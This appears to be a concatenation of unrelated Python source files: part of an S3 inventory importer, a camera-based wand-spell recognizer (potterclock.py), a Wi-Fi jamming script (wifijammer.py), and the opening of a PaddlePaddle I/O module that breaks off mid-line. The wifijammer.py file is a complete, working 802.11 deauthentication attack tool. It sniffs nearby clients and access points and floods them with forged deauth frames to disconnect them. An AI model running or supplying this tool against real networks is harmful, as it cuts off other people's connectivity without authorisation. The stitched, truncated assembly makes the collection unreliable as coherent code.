thread.start() # start importing S3 inventory file(s) inventory_files = cliargs['s3'] logger.info('Importing %s S3 inventory file(s)...' % len(inventory_files)) # add fake disk space to index with path set to /s3 data = { "path": '/s3', "total": 0, "used": 0, "free": 0, "available": 0, "indexing_date": datetime.utcnow().isoformat() } es.index(index=cliargs['index'], doc_type='diskspace', body=data) # add all s3 inventory files to queue for file in inventory_files: s3queue.put((file, cliargs)) # set up progress bar bar = progress_bar('Importing') bar.start() if not cliargs['quiet'] and not cliargs['debug'] and not cliargs['verbose']: i = 1 while s3queue.qsize() > 0: try: percent = int("{0:.0f}".format(100 * ((len(inventory_files) - s3queue.qsize()) / float(len(inventory_files))))) bar.update(percent) except ZeroDivisionError: bar.update(0) except ValueError: bar.update(0) time.sleep(.5) i += 1 bar.finish() # wait for queue to be empty s3queue.join()
potterclock.py
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. #https://github.com/piwheels/piwheels/issues/21 import sys import cv2 from cv2 import * import numpy as np import math import os from os import listdir from os.path import isfile, join, isdir import time import datetime import threading from threading import Thread from statistics import mean from CountsPerSec import CountsPerSec # Import library and create instance of REST client. #from Adafruit_IO import Client #aio = Client('YOUR ADAFRUIT IO USERNAME', 'YOUR ADAFRUIT IO KEY') #from HassApi import HassApi # Check for required number of arguments #if (len(sys.argv) < 4): #print("Incorrect number of arguments. Required Arguments: [video source url] [home assistant URL] [API token]") #sys.exit(0) # Parse Required Arguments #videoSource = sys.argv[1] #hassUrl = sys.argv[2] #hassRestToken = sys.argv[3] # Parse Optional Arguments IsRemoveBackground = True IsShowOutputWindows = True IsTraining = False IsDebugFps = False if (len(sys.argv) >= 5): IsRemoveBackground = sys.argv[4] == "True" if (len(sys.argv) >= 6): IsShowOutputWindows = sys.argv[5] == "True" if (len(sys.argv) >= 7): IsTraining = sys.argv[6] == "True" if (len(sys.argv) >= 8): IsDebugFps = sys.argv[7] == "True" # Initialize Home Assistant Rest API Wrapper #hass = HassApi(hassUrl, hassRestToken) # Constants DesiredFps = 42 DefaultFps = 42 # Original constants trained for 42 FPS MicroSecondsBetweenFrames = (1 / DesiredFps) * 1000000 TrainingResolution = 50 TrainingNumPixels = TrainingResolution * TrainingResolution TrainingFolderName = "Training" SpellEndMovement = 0.5 * (DefaultFps / DesiredFps ) MinSpellLength = 15 * (DesiredFps / DefaultFps) MinSpellDistance = 100 NumDistancesToAverage = int(round( 20 * (DesiredFps / DefaultFps))) # Booleans to turn on or off output windows IsShowOriginal = False IsShowBackgroundRemoved = False IsShowThreshold = False IsShowOutput = False if IsShowOutputWindows: IsShowOriginal = True IsShowBackgroundRemoved = True IsShowThreshold = True IsShowOutput = True # Create Windows if (IsShowOriginal): cv2.namedWindow("Original") cv2.moveWindow("Original", 0, 0) if (IsShowBackgroundRemoved): cv2.namedWindow("BackgroundRemoved") cv2.moveWindow("BackgroundRemoved", 640, 0) if (IsShowThreshold): cv2.namedWindow("Threshold") cv2.moveWindow("Threshold", 0, 480+30) if (IsShowOutput): cv2.namedWindow("Output") cv2.moveWindow("Output", 640, 480+30) # Init Global Variables IsNewFrame = False nameLookup = {} LastSpell = "None" originalCps = CountsPerSec() noBackgroundCps = CountsPerSec() thresholdCps = CountsPerSec() outputCps = CountsPerSec() lk_params = dict( winSize = (25,25), maxLevel = 7, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)) IsNewFrame = False frame = None IsNewFrameNoBackground = False frame_no_background = None IsNewFrameThreshold = False frameThresh = None findNewWands = True trackedPoints = None wandTracks = [] def InitClassificationAlgo() : """ Create and Train k-Nearest Neighbor Algorithm """ global knn, nameLookup labelNames = [] labelIndexes = [] trainingSet = [] numPics = 0 dirCount = 0 scriptpath = os.path.realpath(__file__) trainingDirectory = join(os.path.dirname(scriptpath), TrainingFolderName) # Every folder in the training directory contains a set of images corresponding to a single spell. # Loop through all folders to train all spells. for d in listdir(trainingDirectory): if isdir(join(trainingDirectory, d)): nameLookup[dirCount] = d dirCount = dirCount + 1 for f in listdir(join(trainingDirectory,d)): if isfile(join(trainingDirectory,d,f)): labelNames.append(d) labelIndexes.append(dirCount-1) trainingSet.append(join(trainingDirectory,d,f)); numPics = numPics + 1 print ("Trained Spells: ") print (nameLookup) samples = [] for i in range(0, numPics): img = cv2.imread(trainingSet[i]) gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) samples.append(gray); npArray = np.array(samples) shapedArray = npArray.reshape(-1,TrainingNumPixels).astype(np.float32); # Create KNN and Train knn = cv2.ml.KNearest_create() knn.train(shapedArray, cv2.ml.ROW_SAMPLE, np.array(labelIndexes)) def ClassifyImage(img): """ Classify input image based on previously trained k-Nearest Neighbor Algorithm """ global knn, nameLookup, args if (img.size <= 0): return "Error" size = (TrainingResolution, TrainingResolution) test_gray = cv2.resize(img,size,interpolation=cv2.INTER_LINEAR) imgArr = np.array(test_gray).astype(np.float32) sample = imgArr.reshape(-1, TrainingNumPixels).astype(np.float32) ret, result, neighbours, dist = knn.findNearest(sample,k=5) print(ret, result, neighbours, dist) if IsTraining: filename = "char" + str(time.time()) + nameLookup[ret] + ".png" cv2.imwrite(join(TrainingFolderName, filename), test_gray) if nameLookup[ret] is not None: print("Match: " + nameLookup[ret]) return nameLookup[ret] else: return "error" def PerformSpell(spell): """ Make the desired Home Assistant REST API call based on the spell """ if (spell=="incendio"): print("do this spell") #test = aio.feeds('test') #aio.send_data(test.key, 98.6) #hass.TriggerAutomation("automation.wand_incendio") elif (spell=="aguamenti"): print("do this spell") #hass.TriggerAutomation("automation.wand_aguamenti") elif (spell=="alohomora"): print("do this spell") #hass.TriggerAutomation("automation.wand_alohomora") elif (spell=="silencio"): print("do this spell") #hass.TriggerAutomation("automation.wand_silencio") elif (spell=="specialis_revelio"): print("do this spell") #hass.TriggerAutomation("automation.wand_specialis_revelio") elif (spell=="revelio"): print("do this spell") #hass.TriggerAutomation("automation.wand_revelio") elif (spell == "tarantallegra"): print("do this spell") #hass.TriggerAutomation("automation.wand_tarantallegra") def CheckForPattern(wandTracks, exampleFrame): """ Check the given wandTracks to see if is is complete, and if it matches a trained spell """ global find_new_wands, LastSpell if (wandTracks == None or len(wandTracks) == 0): return thickness = 10 croppedMax = TrainingResolution - thickness distances = [] wand_path_frame = np.zeros_like(exampleFrame) prevTrack = wandTracks[0] for track in wandTracks: x1 = prevTrack[0] x2 = track[0] y1 = prevTrack[1] y2 = track[1] # Calculate the distance distance = math.sqrt((x1 - x2)**2 + (y1 - y2)**2) distances.append(distance) cv2.line(wand_path_frame, (x1, y1),(x2, y2), (255,255,255), thickness) prevTrack = track mostRecentDistances = distances[-NumDistancesToAverage:] avgMostRecentDistances = mean(mostRecentDistances) sumDistances = sum(distances) contours, hierarchy = cv2.findContours(wand_path_frame,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE) # Determine if wand stopped moving by looking at recent movement (avgMostRecentDistances), and check the length of distances to make sure the spell is reasonably long if (avgMostRecentDistances < SpellEndMovement and len(distances) > MinSpellLength): # Make sure wand path is valid and is over the defined minimum distance if (len(contours) > 0) and sumDistances > MinSpellDistance: cnt = contours[0] x,y,w,h = cv2.boundingRect(cnt) crop = wand_path_frame[y-10:y+h+10,x-30:x+w+30] result = ClassifyImage(crop); cv2.putText(wand_path_frame, result, (0,50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255,255,255)) print("Result: ", result, " Most Recent avg: ", avgMostRecentDistances, " Length Distances: ", len(distances), " Sum Distances: ", sumDistances) print("") PerformSpell(result) LastSpell = result find_new_wands = True wandTracks.clear() if wand_path_frame is not None: if (IsShowOutput): wandPathFrameWithText = AddIterationsPerSecText(wand_path_frame, outputCps.countsPerSec()) cv2.putText(wandPathFrameWithText, "Last Spell: " + LastSpell, (10, 400), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255)) cv2.imshow("Output", wandPathFrameWithText) return wandTracks def RemoveBackground(): """ Thread for removing background """ global frame, frame_no_background, IsNewFrame, IsNewFrameNoBackground fgbg = cv2.createBackgroundSubtractorMOG2() t = threading.currentThread() while getattr(t, "do_run", True): if (IsNewFrame): IsNewFrame = False frameCopy = frame.copy() # Subtract Background fgmask = fgbg.apply(frameCopy, learningRate=0.001) frame_no_background = cv2.bitwise_and(frameCopy, frameCopy, mask = fgmask) IsNewFrameNoBackground = True if (IsShowBackgroundRemoved): frameNoBackgroundWithCounts = AddIterationsPerSecText(frame_no_background.copy(), noBackgroundCps.countsPerSec()) cv2.imshow("BackgroundRemoved", frameNoBackgroundWithCounts) else: time.sleep(0.001) def CalculateThreshold(): """ Thread for calculating frame threshold """ global frame, frame_no_background, frameThresh, IsNewFrame, IsNewFrameNoBackground, IsNewFrameThreshold t = threading.currentThread() thresholdValue = 240 while getattr(t, "do_run", True): if (IsRemoveBackground and IsNewFrameNoBackground) or (not IsRemoveBackground and IsNewFrame): if IsRemoveBackground: IsNewFrameNoBackground = False frame_gray = cv2.cvtColor(frame_no_background, cv2.COLOR_BGR2GRAY) if not IsRemoveBackground: IsNewFrame = False frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ret, frameThresh = cv2.threshold(frame_gray, thresholdValue, 255, cv2.THRESH_BINARY); IsNewFrameThreshold = True if (IsShowThreshold): frameThreshWithCounts = AddIterationsPerSecText(frameThresh.copy(), thresholdCps.countsPerSec()) cv2.imshow("Threshold", frameThreshWithCounts) else: time.sleep(0.001) def ProcessData(): """ Thread for processing final frame """ global frameThresh, IsNewFrameThreshold, findNewWands, wandTracks, outputFrameCount oldFrameThresh = None trackedPoints = None t = threading.currentThread() while getattr(t, "do_run", True): if (IsNewFrameThreshold): if (IsDebugFps): outputFrameCount = outputFrameCount + 1 IsNewFrameThreshold = False localFrameThresh = frameThresh.copy() if (findNewWands): # Identify Potential Wand Tips using GoodFeaturesToTrack trackedPoints = cv2.goodFeaturesToTrack(localFrameThresh, 5, .01, 30) if trackedPoints is not None: findNewWands = False else: # calculate optical flow nextPoints, statusArray, err = cv2.calcOpticalFlowPyrLK(oldFrameThresh, localFrameThresh, trackedPoints, None, **lk_params) # Select good points good_new = nextPoints[statusArray==1] good_old = trackedPoints[statusArray==1] if (len(good_new) > 0): # draw the tracks for i,(new,old) in enumerate(zip(good_new,good_old)): a,b = new.ravel() c,d = old.ravel() wandTracks.append([a, b]) # Update which points are tracked trackedPoints = good_new.copy().reshape(-1,1,2) wandTracks = CheckForPattern(wandTracks, localFrameThresh) else: # No Points were tracked, check for a pattern and start searching for wands again #wandTracks = CheckForPattern(wandTracks, localFrameThresh) wandTracks = [] findNewWands = True # Store Previous Threshold Frame oldFrameThresh = localFrameThresh else: time.sleep(0.001) def AddIterationsPerSecText(frame, iterations_per_sec): """ Add iterations per second text to lower-left corner of a frame. """ cv2.putText(frame, "{:.0f} iterations/sec".format(iterations_per_sec), (10, 450), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255)) return frame timeLastPrintedFps = datetime.datetime.now() inputFrameCount = 0 outputFrameCount = 0 # Initialize and traing the spell classification algorithm InitClassificationAlgo() # Start thread to remove frame background if IsRemoveBackground: RemoveBackgroundThread = Thread(target=RemoveBackground) RemoveBackgroundThread.do_run = True RemoveBackgroundThread.daemon = True RemoveBackgroundThread.start() # Start thread to calculate threshold CalculateThresholdThread = Thread(target=CalculateThreshold) CalculateThresholdThread.do_run = True CalculateThresholdThread.daemon = True CalculateThresholdThread.start() # Start thread to process final frame ProcessDataThread = Thread(target=ProcessData) ProcessDataThread.do_run = True ProcessDataThread.daemon = True ProcessDataThread.start() # Set OpenCV video capture source videoCapture = cv2.VideoCapture(videoSource) # Main Loop while True: # Get most recent frame ret, localFrame = videoCapture.read() if (ret): frame = localFrame.copy() # If successful, flip the frame and set the Flag for the next process to take over cv2.flip(frame, 1, frame) # Flipping the frame is done so the spells look like what we expect, instead of the mirror image IsNewFrame = True if (IsDebugFps): inputFrameCount = inputFrameCount + 1 # Print FPS Debug info every second if ((datetime.datetime.now() - timeLastPrintedFps).seconds >= 1 ): timeLastPrintedFps = datetime.datetime.now() print("FPS: %d/%d" %(inputFrameCount, outputFrameCount)) inputFrameCount = 0 outputFrameCount = 0 # Update Windows if (IsShowOriginal): frameWithCounts = AddIterationsPerSecText(frame.copy(), originalCps.countsPerSec()) cv2.imshow("Original", frameWithCounts) elif not ret: # If an error occurred, try initializing the video capture again videoCapture = cv2.VideoCapture(videoSource) # Check for ESC key, if pressed shut everything down if (cv2.waitKey(1) is 27): break # Shutdown PyPotter if IsRemoveBackground: RemoveBackgroundThread.do_run = False RemoveBackgroundThread.join() CalculateThresholdThread.do_run = False ProcessDataThread.do_run = False CalculateThresholdThread.join() ProcessDataThread.join() cv2.destroyAllWindows()
wifijammer.py
#!/usr/bin/env python # -*- coding: UTF-8 -*- import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy from scapy.all import * conf.verb = 0 # Scapy I thought I told you to shut up import os import sys import time from threading import Thread, Lock from subprocess import Popen, PIPE from signal import SIGINT, signal import argparse import socket import struct import fcntl # Console colors W = '\033[0m' # white (normal) R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue P = '\033[35m' # purple C = '\033[36m' # cyan GR = '\033[37m' # gray T = '\033[93m' # tan def parse_args(): #Create the arguments parser = argparse.ArgumentParser() parser.add_argument("-s", "--skip", nargs='*', default=[], help="Skip deauthing this MAC address. \ Example: -s 00:11:BB:33:44:AA") parser.add_argument("-i", "--interface", help="Choose monitor mode interface. \ By default script will find the most powerful \ interface and starts monitor mode on it. \ Example: -i mon5") parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. \ Example: -c 6") parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. \ List of clients will be emptied and repopulated \ after hitting the limit. Example: -m 5") parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) \ number of client/AP combos is reached. \ Must be used in conjunction with -m. \ Example: -m 10 -n", action='store_true') parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. \ Default is as fast as possible. \ If you see scapy errors like 'no buffer space' \ try: -t .00001") parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. \ Default value is 1; \ 1 packet to the client and 1 packet to the AP. \ Send 2 deauth packets to the client \ and 2 deauth packets to the AP: -p 2") parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast \ address of the access points and only send them \ to client/AP pairs", action='store_true') parser.add_argument("-a", "--accesspoint", nargs='*', default=[], help="Enter the SSID or MAC address of a specific access point to target") parser.add_argument("--world", help="N. American standard is 11 channels but the rest \ of the world it's 13 so this options enables the \ scanning of 13 channels", action="store_true") return parser.parse_args() ######################################## # Begin interface info and manipulation ######################################## def get_mon_iface(args): global monitor_on monitors, interfaces = iwconfig() if args.interface: monitor_on = True return args.interface if len(monitors) > 0: monitor_on = True return monitors[0] else: # Start monitor mode on a wireless interface print '['+G+'*'+W+'] Finding the most powerful interface...' interface = get_iface(interfaces) monmode = start_mon_mode(interface) return monmode def iwconfig(): monitors = [] interfaces = {} try: proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN) except OSError: sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"') for line in proc.communicate()[0].split('\n'): if len(line) == 0: continue # Isn't an empty string if line[0] != ' ': # Doesn't start with space wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line) if not wired_search: # Isn't wired iface = line[:line.find(' ')] # is the interface if 'Mode:Monitor' in line: monitors.append(iface) elif 'IEEE 802.11' in line: if "ESSID:\"" in line: interfaces[iface] = 1 else: interfaces[iface] = 0 return monitors, interfaces def get_iface(interfaces): scanned_aps = [] if len(interfaces) < 1: sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again') if len(interfaces) == 1: for interface in interfaces: return interface # Find most powerful interface for iface in interfaces: count = 0 proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN) for line in proc.communicate()[0].split('\n'): if ' - Address:' in line: # first line in iwlist scan for a new AP count += 1 scanned_aps.append((count, iface)) print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W try: interface = max(scanned_aps)[1] return interface except Exception as e: for iface in interfaces: interface = iface print '['+R+'-'+W+'] Minor error:',e print ' Starting monitor mode on '+G+interface+W return interface def start_mon_mode(interface): print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W try: os.system('ifconfig %s down' % interface) os.system('iwconfig %s mode monitor' % interface) os.system('ifconfig %s up' % interface) return interface except Exception: sys.exit('['+R+'-'+W+'] Could not start monitor mode') def remove_mon_iface(mon_iface): os.system('ifconfig %s down' % mon_iface) os.system('iwconfig %s mode managed' % mon_iface) os.system('ifconfig %s up' % mon_iface) def mon_mac(mon_iface): ''' http://stackoverflow.com/questions/159137/getting-mac-address ''' s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15])) mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1] print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W return mac ######################################## # End of interface info and manipulation ######################################## def channel_hop(mon_iface, args): ''' First time it runs through the channels it stays on each channel for 5 seconds in order to populate the deauth list nicely. After that it goes as fast as it can ''' global monchannel, first_pass channelNum = 0 maxChan = 11 if not args.world else 13 err = None while 1: if args.channel: with lock: monchannel = args.channel else: channelNum +=1 if channelNum > maxChan: channelNum = 1 with lock: first_pass = 0 with lock: monchannel = str(channelNum) try: proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE) except OSError: print '['+R+'-'+W+'] Could not execute "iw"' os.kill(os.getpid(),SIGINT) sys.exit(1) for line in proc.communicate()[1].split('\n'): if len(line) > 2: # iw dev shouldnt display output unless there's an error err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W output(err, monchannel) if args.channel: time.sleep(.05) else: # For the first channel hop thru, do not deauth if first_pass == 1: time.sleep(1) continue deauth(monchannel) def deauth(monchannel): ''' addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's multi-APs to one gateway. Constantly scans the clients_APs list and starts a thread to deauth each instance ''' pkts = [] if len(clients_APs) > 0: with lock: for x in clients_APs: client = x[0] ap = x[1] ch = x[2] # Can't add a RadioTap() layer as the first layer or it's a malformed # Association request packet? # Append the packets to a new list so we don't have to hog the lock # type=0, subtype=12? if ch == monchannel: deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth() deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth() pkts.append(deauth_pkt1) pkts.append(deauth_pkt2) if len(APs) > 0: if not args.directedonly: with lock: for a in APs: ap = a[0] ch = a[1] if ch == monchannel: deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth() pkts.append(deauth_ap) if len(pkts) > 0: # prevent 'no buffer space' scapy error http://goo.gl/6YuJbI if not args.timeinterval: args.timeinterval = 0 if not args.packets: args.packets = 1 for p in pkts: send(p, inter=float(args.timeinterval), count=int(args.packets)) def output(err, monchannel): os.system('clear') if err: print err else: print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n' if len(clients_APs) > 0: print ' Deauthing ch ESSID' # Print the deauth list with lock: for ca in clients_APs: if len(ca) > 3: print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W else: print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2] if len(APs) > 0: print '\n Access Points ch ESSID' with lock: for ap in APs: print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W print '' def noise_filter(skip, addr1, addr2): # Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC] if skip: ignore += [addr.lower() for addr in skip] for i in ignore: if i in addr1 or i in addr2: return True def cb(pkt): ''' Look for dot11 packets that aren't to or from broadcast address, are type 1 or 2 (control, data), and append the addr1 and addr2 to the list of deauth targets. ''' global clients_APs, APs # return these if's keeping clients_APs the same or just reset clients_APs? # I like the idea of the tool repopulating the variable more if args.maximum: if args.noupdate: if len(clients_APs) > int(args.maximum): return else: if len(clients_APs) > int(args.maximum): with lock: clients_APs = [] APs = [] # We're adding the AP and channel to the deauth list at time of creation rather # than updating on the fly in order to avoid costly for loops that require a lock if pkt.haslayer(Dot11): if pkt.addr1 and pkt.addr2: pkt.addr1 = pkt.addr1.lower() pkt.addr2 = pkt.addr2.lower() # Filter out all other APs and clients if asked if args.accesspoint: # track bssid for essid if (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and pkt[Dot11Elt].info in args.accesspoint: args.accesspoint.add(pkt[Dot11].addr3.lower()) # bail if bssid is not in target list if not args.accesspoint.intersection([pkt.addr1.lower(), pkt.addr2.lower()]): # pkt does not match our target list return if args.skip: if pkt.addr2 in args.skip: return # Check if it's added to our AP list if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp): APs_add(clients_APs, APs, pkt, args.channel, args.world) # Ignore all the noisy packets like spanning tree #if noise_filter(skip, pkt.addr1, pkt.addr2): # return # Management = 1, data = 2 if pkt.type in [1, 2]: clients_APs_add(clients_APs, pkt.addr1, pkt.addr2) def APs_add(clients_APs, APs, pkt, chan_arg, world_arg): ssid = pkt[Dot11Elt].info bssid = pkt[Dot11].addr3.lower() try: # Thanks to airoscapy for below ap_channel = str(ord(pkt[Dot11Elt:3].info)) chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'] if ap_channel not in chans: return if chan_arg: if ap_channel != chan_arg: return except Exception as e: return if len(APs) == 0: with lock: return APs.append([bssid, ap_channel, ssid]) else: for b in APs: if bssid in b[0]: return with lock: return APs.append([bssid, ap_channel, ssid]) def clients_APs_add(clients_APs, addr1, addr2): if len(clients_APs) == 0: if len(APs) == 0: with lock: return clients_APs.append([addr1, addr2, monchannel]) else: AP_check(addr1, addr2) # Append new clients/APs if they're not in the list else: for ca in clients_APs: if addr1 in ca and addr2 in ca: return if len(APs) > 0: return AP_check(addr1, addr2) else: with lock: return clients_APs.append([addr1, addr2, monchannel]) def AP_check(addr1, addr2): for ap in APs: if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower(): with lock: return clients_APs.append([addr1, addr2, ap[1], ap[2]]) def stop(signal, frame): if monitor_on: sys.exit('\n['+R+'!'+W+'] Closing') else: remove_mon_iface(mon_iface) os.system('service network-manager restart') sys.exit('\n['+R+'!'+W+'] Closing') if __name__ == "__main__": if os.geteuid(): sys.exit('['+R+'-'+W+'] Please run as root') clients_APs = [] APs = [] DN = open(os.devnull, 'w') lock = Lock() args = parse_args() args.skip = list(map(str.lower, args.skip)) # lowercase bssids while leaving essids intact args.accesspoint = set(_.lower() if ':' in _ else _ for _ in args.accesspoint) monitor_on = None mon_iface = get_mon_iface(args) conf.iface = mon_iface mon_MAC = mon_mac(mon_iface) first_pass = 1 # Start channel hopping hop = Thread(target=channel_hop, args=(mon_iface, args)) hop.daemon = True hop.start() signal(SIGINT, stop) try: sniff(iface=mon_iface, store=0, prn=cb) except Exception as msg: remove_mon_iface(mon_iface) os.system('service network-manager restart') print '\n['+R+'!'+W+'] Closing' sys.exit(0)
io.py
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function from ..wrapped_decorator import signature_safe_contextmanager import multiprocessing import os import six import sys import threading from ..data_feeder import DataFeeder from .control_flow import BlockGuard from .layer_function_generator import templatedoc from .. import core from ..executor import global_scope from ..framework import convert_np_dtype_to_dtype_, default_main_program, \ default_startup_program, program_guard, Program, Variable from ..layer_helper import LayerHelper from ..unique_name import generate as unique_name import logging __all__ = [ 'data', 'read_file', 'double_buffer', 'py_reader', 'create_py_reader_by_data', 'load' ] def data(name, shape, append_batch_size=True, dtype='float32', lod_level=0, type=core.VarDesc.VarType.LOD_TENSOR, stop_gradient=True): """ **Data Layer** This operator creates the global variable. The global variables can be accessed by all the following operators in the graph. Note: :code:`paddle.fluid.layers.data` is deprecated as it will be removed in a later version. Please use :code:`paddle.fluid.data` . This :code:`paddle.fluid.layers.data` set shape and dtype at compile time but does NOT check the shape or the dtype of feeded data, the :code:`paddle.fluid.data` checks the shape and the dtype of data feeded by Executor or ParallelExecutor during run time. To feed variable size inputs, users can feed variable size inputs directly to this :code:`paddle.fluid.layers.data` and PaddlePaddle will fit the size accordingly. Or set -1 on the variable dimension when using :code:`paddle.fluid.data` . The default :code:`stop_gradient` attribute of the Variable created by this API is true, which means the gradient won't be passed backward through the data Varaible. Set :code:`var.stop_gradient = False` If user would like to pass backward gradient. Args: name(str): The name/alias of the variable, see :ref:`api_guide_Name` for more details. shape(list): Tuple declaring the shape. If :code:`append_batch_size` is True and there is no -1 inside :code:`shape`, it should be considered as the shape of the each sample. Otherwise, it should be considered as the shape of the batched data. append_batch_size(bool): 1. If true, it prepends -1 to the shape. For example if shape=[1], the resulting shape is [-1, 1]. This will be useful to set different batch size at run time. 2. If shape contains -1, such as shape=[1, -1]. append_batch_size will be enforced to be be False (ineffective) because PaddlePaddle cannot set more than 1 unknown number on the shape. dtype(np.dtype|VarType|str): The type of the data. Supported dtype: bool, float16, float32, float64, int8, int16, int32, int64, uint8. type(VarType): The output type. Supported dtype: VarType.LOD_TENSOR, VarType.SELECTED_ROWS, VarType.NCCL_ID. Default: VarType.LOD_TENSOR. lod_level(int): The LoD Level. 0 means the input data is not a sequence. Default: 0. stop_gradient(bool): A boolean that mentions whether gradient should flow. Default: True. Returns: The global variable that gives access to the data. Return Type: Variable Examples: .. code-block:: python import paddle.fluid as fluid data = fluid.layers.data(name='x', shape=[784], dtype='float32') """ helper = LayerHelper('data', **locals()) shape = list(shape) for i in six.moves.range(len(shape)): if shape[i] is None: shape[i] = -1 append_batch_size = False elif shape[i] < 0: append_batch_size = False if append_batch_size: shape = [-1] + shape # append batch size as -1 data_var = helper.create_global_variable( name=name, shape=shape, dtype=dtype, type=type, stop_gradient=stop_gradient, lod_level=lod_level, is_data=True) return data_var class BlockGuardServ(BlockGuard): """ BlockGuardServ class. BlockGuardServ class is used to create an op with a block in a program. """ def __init__(self, server): if not (isinstance(server, ListenAndServ)): raise TypeError("BlockGuardServ takes a ListenAndServ") super(BlockGuardServ, self).__init__(server.helper.main_program) self.server = server def __exit__(self, exc_type, exc_val, exc_tb): if exc_type is not None: return False self.server.complete_op() return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb) class ListenAndServ(object): """ **ListenAndServ Layer** ListenAndServ is used to create a rpc server bind and listen on specific TCP port, this server will run the sub-block when received variables from clients. Args: endpoint(string): IP:port string which the server will listen on. inputs(list): a list of variables that the server will get from clients. fan_in(int): how many client are expected to report to this server, default: 1. optimizer_mode(bool): whether to run the server as a parameter server, default: True. Examples: .. code-block:: python import paddle.fluid as fluid with fluid.program_guard(main): serv = layers.ListenAndServ( "127.0.0.1:6170", ["X"], optimizer_mode=False) with serv.do(): x = layers.data( shape=[32, 32], dtype='float32', name="X", append_batch_size=False) fluid.initializer.Constant(value=1.0)(x, main.global_block()) layers.scale(x=x, scale=10.0, out=out_var) exe = fluid.Executor(place) exe.run(main) """ def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True): self.helper = LayerHelper("listen_and_serv") self.inputs = inputs self.outputs = [] self.endpoint = endpoint self.fan_in = fan_in # FIXME(typhoonzero): add optimizer_mode is stupid, should make it more # general. self.optimizer_mode = optimizer_mode def do(self): return BlockGuardServ(self) def get_params_and_grads(self): main_program = self.helper.main_program current_block = main_program.current_block() parent_block = self.parent_block() # params and grads in the same order. params = list() grads = list() for op in current_block.ops: # FIXME(typhoonzero): op.inputs is None if it's cloned. if self.optimizer_mode: if "Grad" in op.inputs and "Param" in op.inputs: params.append(op.inputs["Param"].name) grads.append(op.inputs["Grad"].name) else: # simple recv mode, recv operators inputs. for iname in op.input_names: for in_var_name in op.input(iname): params.append(parent_block.var(in_var_name)) grads.append(parent_block.var(in_var_name)) return params, grads def parent_block(self): prog = self.helper.main_program parent_idx = prog.current_block().parent_idx assert parent_idx >= 0 parent_block = prog.block(parent_idx) return parent_block def complete_op(self): main_program = self.helper.main_program current_block = main_program.current_block() parent_block = 